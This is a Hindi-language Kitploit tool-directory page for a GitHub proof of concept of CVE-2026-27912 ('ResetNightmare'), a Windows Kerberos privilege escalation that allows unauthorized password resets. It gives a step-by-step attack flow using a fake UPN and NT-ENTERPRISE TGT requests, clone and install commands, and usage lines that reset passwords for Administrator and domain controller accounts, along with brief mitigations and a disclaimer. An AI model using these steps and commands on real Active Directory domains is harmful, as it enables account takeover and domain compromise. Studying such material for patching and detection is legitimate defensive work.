Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Kerberos-CVE-2026-27912 — CVE-2026-27912 के लिए PoC - Windows Kerberos विशेषाधिकार उन्नयन (ResetNightmare)। Kerberos दोष के माध्यम से अनधिकृत पासवर्ड रीसेट। केवल सुरक्षा अनुसंधान के लिए। | Kitploit
उपकरण/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिपासवर्ड हमलेशोषणपेनिट्रेशन टेस्टिंग
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

CVE-2026-27912 के लिए PoC - Windows Kerberos विशेषाधिकार उन्नयन (ResetNightmare)। Kerberos दोष के माध्यम से अनधिकृत पासवर्ड रीसेट। केवल सुरक्षा अनुसंधान के लिए।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
21026 दिन पहलेअभी तक समीक्षित नहीं

Kerberos-CVE-2026-27912

CVE-2026-27912 - विंडोज़ केर्बेरोस विशेषाधिकार उन्नयन भेद्यता

ResetNightmare - केर्बेरोस चेंज पासवर्ड प्रोटोकॉल की खामी के माध्यम से अनधिकृत पासवर्ड रीसेट


📋 विवरण

फ़ील्डमान
CVECVE-2026-27912
शीर्षकविंडोज़ केर्बेरोस विशेषाधिकार उन्नयन भेद्यता
CVSS8.0 उच्च (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: अनुचित प्राधिकरण
प्रकाशित14 अप्रैल, 2026
पैच किया गयाअप्रैल 2026

🔍 हमला प्रवाह

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 आवश्यकताएँ

  • पॉवरशेल के साथ विंडोज़
  • ActiveDirectory मॉड्यूल (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (GhostPack/Rubeus से डाउनलोड करें)
  • डोमेन कंट्रोलर तक नेटवर्क पहुँच

🚀 स्थापना

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 उपयोग

मूल हमला

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

लक्ष्य कंप्यूटर खाता

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

नया खाता बनाएँ

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

वर्बोज़ मोड

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 आर्ग्युमेंट्स


🛡️ शमन

  1. आधिकारिक पैच लागू करें Microsoft सुरक्षा अद्यतन से
  2. नेटवर्क सेगमेंट करें ताकि निकटवर्ती नेटवर्क पहुँच सीमित हो
  3. न्यूनतम विशेषाधिकार लागू करें - UPN लेखन अनुमतियाँ प्रतिबंधित करें
  4. निगरानी करें संदिग्ध UPN परिवर्तनों और पासवर्ड रीसेट की

⚠️ अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक अनुसंधान के लिए।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ़्टवेयर के दुरुपयोग के लिए कोई दायित्व नहीं लेता है।


📚 संदर्भ

  • NVD: CVE-2026-27912
  • Microsoft सुरक्षा अद्यतन मार्गदर्शिका

👨‍💻 लेखक

n0vax1337 / सुरक्षा शोधकर्ता


📄 लाइसेंस

MIT लाइसेंस - देखें LICENSE


अंतिम अद्यतन: 2026

टूल डाउनलोड करें
फ़्लैगविवरणडिफ़ॉल्ट
-t / --targetलक्ष्य खाते का नामआवश्यक
-p / --new-passwordलक्ष्य के लिए नया पासवर्डआवश्यक
-u / --upn-userवह खाता जिस पर फर्जी UPN सेट करना हैआवश्यक
-up / --upn-passwordUPN खाते का पासवर्डआवश्यक
-c / --computerUPNUser एक कंप्यूटर खाता हैफ़्लैग
-r / --rubeus-pathRubeus.exe का पथRubeus.exe
-e / --encryptionसमर्थित एन्क्रिप्शन प्रकारAES256
-path / --create-pathनया खाता बनाने के लिए OU पथ""
-d / --dcडोमेन कंट्रोलर का नामस्वतः पता लगाएँ
-v / --verboseवर्बोज़ आउटपुटफ़्लैग